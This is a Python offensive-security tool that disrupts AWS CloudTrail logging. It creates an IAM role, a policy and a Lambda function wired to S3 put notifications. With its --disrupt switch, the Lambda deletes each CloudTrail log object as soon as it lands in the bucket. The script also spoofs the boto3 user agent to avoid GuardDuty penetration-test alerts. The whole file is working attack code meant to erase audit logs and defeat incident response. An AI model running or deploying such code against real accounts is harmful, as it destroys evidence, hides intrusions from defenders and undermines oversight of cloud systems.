#!/usr/bin/python3 # # This script attempts to disrupt CloudTrail by planting a Lambda function that will delete every object created in S3 bucket # bound to a trail. As soon as CloudTrail creates a new object in S3 bucket, Lambda will kick in and delete that object. # No object, no logs. No logs, no Incident Response :-) # # One will need to pass AWS credentials to this tool. Also, the account affected should have at least following permissions: # - `iam:CreateRole` # - `iam:CreatePolicy` # - `iam:AttachRolePolicy` # - `lambda:CreateFunction` # - `lambda:AddPermission` # - `s3:PutBucketNotification` # # These are the changes to be introduced within a specified AWS account: # - IAM role will be created, by default with name: `cloudtrail_helper_role` # - IAM policy will be created, by default with name: `cloudtrail_helper_policy` # - Lambda function will be created, by default with name: `cloudtrail_helper_function` # - Put Event notification will be configured on affected CloudTrail S3 buckets. # # This tool will fail upon first execution with the following exception: # # ``` # [-] Could not create a Lambda function: An error occurred (InvalidParameterValueException) when calling the CreateFunction operation: # The role defined for the function cannot be assumed by Lambda. # ``` # # At the moment I did not find an explanation for that, but running the tool again with the same set of parameters - get the job done. # # Afterwards, one should see following logs in CloudWatch traces for planted Lambda function - if no `--disrupt` option was specified: # # ``` # [*] Following S3 object could be removed: (Bucket=90112981864022885796153088027941100000000000000000000000, # Key=cloudtrail/AWSLogs/712800000000/CloudTrail/us-west-2/2019/03/20/712800000000_CloudTrail_us-west-2_20190320T1000Z_oxxxxxxxxxxxxc.json.gz) # ``` # # Requirements: # - boto3 # - pytest # # Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com> # import io import sys import time import json import boto3 import urllib import zipfile import argparse config = { 'debug' : False, 'region' : '', 'trail-name' : '', 'access-key' : '', 'secret-key' : '', 'token' : '', 'disrupt' : False, 'role-name' : '', 'policy-name' : '', 'function-name' : '', 'statement-id' : 'ID-1', } aws_policy_lambda_assume_role = { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Service": "lambda.amazonaws.com" }, "Action": "sts:AssumeRole" } ] } aws_policy_for_lambda_role = { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents" ], "Resource": "arn:aws:logs:*:*:*" }, { "Effect": "Allow", "Action": [ "s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:DeleteObjectVersion" ], "Resource": [ "arn:aws:s3:::*" ] } ] } aws_s3_bucket_notification_configuration = { "LambdaFunctionConfigurations": [ { "LambdaFunctionArn": "<TO-BE-CREATED-LATER>", "Id": config['statement-id'], "Events": [ "s3:ObjectCreated:*" ] } ] } disruption_lambda_code_do_harm = ''' response = s3.delete_object(Bucket=bucket, Key=key) ''' disruption_lambda_code_no_harm = ''' print("[*] Following S3 object could be removed: (Bucket={}, Key={})".format(bucket, key)) ''' disruption_lambda_code = ''' import json import urllib import boto3 s3 = boto3.client('s3') def lambda_handler(event, context): try: bucket = event['Records'][0]['s3']['bucket']['name'] key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8') {code} except Exception as e: print('S3 delete object failed: ' + str(e)) raise e ''' class Logger: @staticmethod def _out(x): sys.stdout.write(x + '\n') @staticmethod def out(x): Logger._out('[>] ' + x) @staticmethod def info(x): Logger._out('[.] ' + x) @staticmethod def fatal(x): sys.stdout.write('[!] ' + x + '\n') sys.exit(1) @staticmethod def fail(x): Logger._out('[-] ' + x) @staticmethod def ok(x): Logger._out('[+] ' + x) @staticmethod def dbg(x): if config['debug']: sys.stdout.write(f'[dbg] {x}\n') class CloudTrailDisruptor: session = None def __init__(self, region, access_key, secret_key, token = ''): self.region = region self.access_key = access_key self.secret_key = secret_key self.token = token self.session = None self.authenticate() def authenticate(self): try: self.session = None self.session = boto3.Session( aws_access_key_id = self.access_key, aws_secret_access_key = self.secret_key, aws_session_token = self.token, region_name = self.region ) except Exception as e: Logger.fail(f'Could obtain AWS session: {e}') raise e def get_session(self): return self.session def get_account_id(self): try: return self.session.client('sts').get_caller_identity()['Account'] except Exception as e: Logger.fatal(f'Could not Get Caller\'s identity: {e}') def find_trails_to_disrupt(self): cloudtrail = self.session.client('cloudtrail') trails = cloudtrail.describe_trails() disrupt = [] for trail in trails['trailList']: Logger.dbg(f"Checking whether trail {trail['Name']} is logging.") status = cloudtrail.get_trail_status(Name = trail['Name']) if status and status['IsLogging']: r = 'Yes' if trail['IsMultiRegionTrail'] else 'No' Logger.ok(f"Trail {trail['Name']} is actively logging (multi region? {r}).") disrupt.append(trail) return disrupt def create_role(self, role_name, role_policy, description = ''): iam = self.session.client('iam') policy = json.dumps(role_policy) roles = iam.list_roles() for role in roles['Roles']: if role['RoleName'] == role_name: Logger.fail(f'Role with name: {role_name} already exists.') Logger.dbg("Returning: {}".format(str({'Role':role}))) return {'Role' : role} Logger.info(f'Creating a role named: {role_name}') Logger.dbg(f'Policy to be used in role creation:\n{policy}') out = {} try: out = iam.create_role( RoleName = role_name, AssumeRolePolicyDocument = policy, Description = description ) except Exception as e: Logger.fatal(f'Could not create a role for Lambda: {e}') # Due to fatal, code will not reach this path return False Logger.ok(f'Role created.') Logger.dbg(f'Returned: {out}') return out def create_role_policy(self, policy_name, policy_document, description = ''): iam = self.session.client('iam') policy = json.dumps(policy_document) policies = iam.list_policies(Scope = 'All') for p in policies['Policies']: if p['PolicyName'] == policy_name: Logger.fail(f'Policy with name: {policy_name} already exists.') return {'Policy' : p} Logger.info(f'Creating a policy named: {policy_name}') Logger.dbg(f'Policy to be used in role creation:\n{policy}') out = {} try: out = iam.create_policy( PolicyName = policy_name, PolicyDocument = policy, Description = description ) except Exception as e: Logger.fatal(f'Could not create a policy for that lambda role: {e}') # Due to fatal, code will not reach this path return False Logger.ok(f'Policy created.') Logger.dbg(f'Returned: {out}') return out def attach_role_policy(self, role_name, policy_arn): Logger.info(f'Attaching policy ({policy_arn}) to the role {role_name}') iam = self.session.client('iam') attached = iam.list_attached_role_policies(RoleName = role_name) for policy in attached['AttachedPolicies']: if policy['PolicyArn'] == policy_arn: Logger.fail(f'Policy is already attached.') return True try: iam.attach_role_policy( RoleName = role_name, PolicyArn = policy_arn ) except Exception as e: Logger.fatal(f'Could not create a policy for that lambda role: {e}') # Due to fatal, code will not reach this path return False Logger.ok(f'Policy attached.') return True # Source: https://stackoverflow.com/a/51899017 @staticmethod def create_in_mem_zip_archive(file_map, files): buf = io.BytesIO() Logger.dbg("Building zip file: " + str(files)) with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zfh: for file_name in files: file_blob = file_map.get(file_name) if file_blob is None: Logger.fail("Missing file {} from files".format(file_name)) continue try: info = zipfile.ZipInfo(file_name) info.date_time = time.localtime() info.compress_type = zipfile.ZIP_DEFLATED info.external_attr = 0o777 << 16 # give full access zfh.writestr(info, file_blob) except Exception as ex: raise ex Logger.fail("Error reading file: " + file_name + ", error: " + ex.message) buf.seek(0) return buf.read() def create_lambda_function(self, function_name, role_name, code, description = ''): awslambda = self.session.client('lambda') lambdacode = CloudTrailDisruptor.create_in_mem_zip_archive( {'lambda_function.py': code}, {'lambda_function.py'} ) funcs = awslambda.list_functions() for f in funcs['Functions']: if f['FunctionName'] == function_name: Logger.fail(f'Function with name: {function_name} already exists. Removing old one.') awslambda.delete_function(FunctionName = function_name) Logger.ok('Old function was removed.') break Logger.info(f'Creating a lambda function named: {function_name} on Role: {role_name}') Logger.dbg(f'Lambda code to be used:\n{code}') out = {} try: out = awslambda.create_function( FunctionName = function_name, Runtime = 'python2.7', Role = role_name, Handler = 'lambda_function.lambda_handler', Code = { 'ZipFile' : lambdacode, }, Description = description, Timeout = 30, Publish = True ) Logger.ok(f'Function created.') except Exception as e: Logger.fail(f'Could not create a Lambda function: {e}') if 'The role defined for the function cannot be assumed by Lambda.' in str(e): Logger.info('====> This is a known bug (?). Running again this program should get the job done.') Logger.dbg(f'Returned: {out}') return out def permit_function_invoke(self, function_name, statement_id, bucket_arn): awslambda = self.session.client('lambda') Logger.info(f'Adding invoke permission to func: {function_name} on S3 bucket: {bucket_arn}') try: out = awslambda.add_permission( FunctionName = function_name, Action = 'lambda:InvokeFunction', Principal = 's3.amazonaws.com', SourceArn = bucket_arn, StatementId = statement_id ) except Exception as e: Logger.fail(f'Could not add permission to the Lambda: {e}. Continuing anyway.') return out def set_s3_put_notification(self, bucket, notification_configuration): s3 = self.session.client('s3') arn = notification_configuration['LambdaFunctionConfigurations'][0]['LambdaFunctionArn'] conf = s3.get_bucket_notification_configuration(Bucket = bucket) if 'LambdaFunctionConfigurations' in conf.keys(): for configuration in conf['LambdaFunctionConfigurations']: if configuration['Id'] == config['statement-id'] and arn == configuration['LambdaFunctionArn']: Logger.fail('S3 Put notification already configured for that function on that S3 bucket.') return True Logger.info(f'Putting a bucket notification configuration to {bucket}, ARN: {arn}') Logger.dbg(f'Notification used :\n{notification_configuration}') out = {} try: out = s3.put_bucket_notification_configuration( Bucket = bucket, NotificationConfiguration = notification_configuration ) except Exception as e: Logger.fail(f'Could not put bucket notification configuration: {e}') return False return True def parseOptions(argv): global config print(''' :: AWS CloudTrail disruption via S3 Put notification to Lambda Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Mariusz B. / mgeeky '19, <mb@binary-offensive.com> ''') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]') parser._action_groups.pop() required = parser.add_argument_group('required arguments') optional = parser.add_argument_group('optional arguments') required.add_argument('region', type=str, help = 'AWS region to use.') required.add_argument('--access-key', type=str, help = 'AWS Access Key ID') required.add_argument('--secret-key', type=str, help = 'AWS Access Key ID') optional.add_argument('--token', type=str, help = 'AWS temporary session token') optional.add_argument('trail_name', type=str, default = 'all', nargs='?', help = 'CloudTrail name that you want to disrupt. If not specified, will disrupt every actively logging trail.') optional.add_argument('--disrupt', action='store_true', default = False, help = 'By default, this tool will install Lambda that is only logging that it could remove S3 objects. By using this switch, there is going to be Lambda introduced that actually deletes objects.') optional.add_argument('--role-name', type=str, default='cloudtrail_helper_role', help = 'name for AWS Lambda role') optional.add_argument('--policy-name', type=str, default='cloudtrail_helper_policy', help = 'name for a policy for that Lambda role') optional.add_argument('--function-name', type=str, default='cloudtrail_helper_function', help = 'name for AWS Lambda function') parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.') args = parser.parse_args() config['debug'] = args.debug config['access-key'] = args.access_key config['secret-key'] = args.secret_key config['token'] = args.token config['region'] = args.region config['disrupt'] = args.disrupt config['trail-name'] = args.trail_name config['role-name'] = args.role_name config['policy-name'] = args.policy_name config['function-name'] = args.function_name if not args.access_key or not args.secret_key: Logger.fatal("Please provide AWS Access Key, Secret Key and optionally Session Token") return args def monkeyPatchBotocoreUserAgent(): ''' This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts Source: https://www.thesubtlety.com/post/patching-boto3-useragent/ ''' import sys import boto3 import botocore try: from _pytest.monkeypatch import MonkeyPatch except (ImportError, ModuleNotFoundError) as e: print('[!] Please install "pytest" first: pip3 install pytest') print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection') sys.exit(0) monkeypatch = MonkeyPatch() def my_user_agent(self): return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic" monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent) def main(argv): opts = parseOptions(argv) if not opts: Logger.err('Options parsing failed.') return False monkeyPatchBotocoreUserAgent() dis = CloudTrailDisruptor( config['region'], config['access-key'], config['secret-key'], config['token'] ) account_id = dis.get_account_id() Logger.info(f'Will be working on Account ID: {account_id}') Logger.info('Step 1: Determine trail to disrupt') trails = [] if config['trail-name'] and config['trail-name'] != 'all': Logger.ok(f"Will use trail specified by user: {config['trail-name']}") trail_name = config['trail-name'] ct = dis.get_session().client('cloudtrail') t = ct.describe_trails(trailNameList=[trail_name,]) trails.append(t[0]) else: trails.extend(dis.find_trails_to_disrupt()) Logger.info('Trails intended to be disrupted:') for trail in trails: Logger._out(f'\t- {trail["Name"]}') Logger._out('') Logger.info('Step 2: Create a role to be assumed by planted Lambda') created_role = dis.create_role(config['role-name'], aws_policy_lambda_assume_role) if not created_role: Logger.fatal('Could not create a lambda role.') Logger.info('Step 3: Create a policy for that role') policy = dis.create_role_policy(config['policy-name'], aws_policy_for_lambda_role) if not policy: Logger.fatal('Could not create a policy for lambda role.') Logger.info('Step 4: Attach policy to the role') if not dis.attach_role_policy(config['role-name'], policy['Policy']['Arn']): Logger.fatal('Could not attach a policy to the lambda role.') Logger.info('Step 5: Create Lambda function') code = '' if config['disrupt']: code = disruption_lambda_code.format(code = disruption_lambda_code_do_harm) Logger.info('\tUSING DISRUPTIVE LAMBDA!') else: code = disruption_lambda_code.format(code = disruption_lambda_code_no_harm) Logger.info('\tUsing non-disruptive lambda.') if not dis.create_lambda_function(config['function-name'], created_role['Role']['Arn'], code): Logger.fatal('Could not create a Lambda function.') Logger.info('Step 6: Permit function to be invoked on all trails') for trail in trails: bucket_arn = f"arn:aws:s3:::{trail['S3BucketName']}" dis.permit_function_invoke(config['function-name'], config['statement-id'], bucket_arn) Logger.info('Step 7: Configure trail bucket\'s put notification') global aws_s3_bucket_notification_configuration regions = [config['region'], ] for region in regions: arn = f"arn:aws:lambda:{region}:{account_id}:function:{config['function-name']}" aws_s3_bucket_notification_configuration['LambdaFunctionConfigurations'][0]['LambdaFunctionArn'] = arn for trail in trails: dis.set_s3_put_notification( trail['S3BucketName'], aws_s3_bucket_notification_configuration ) print("[+] Installed CloudTrail's S3 bucket disruption Lambda.") if __name__ == '__main__': main(sys.argv)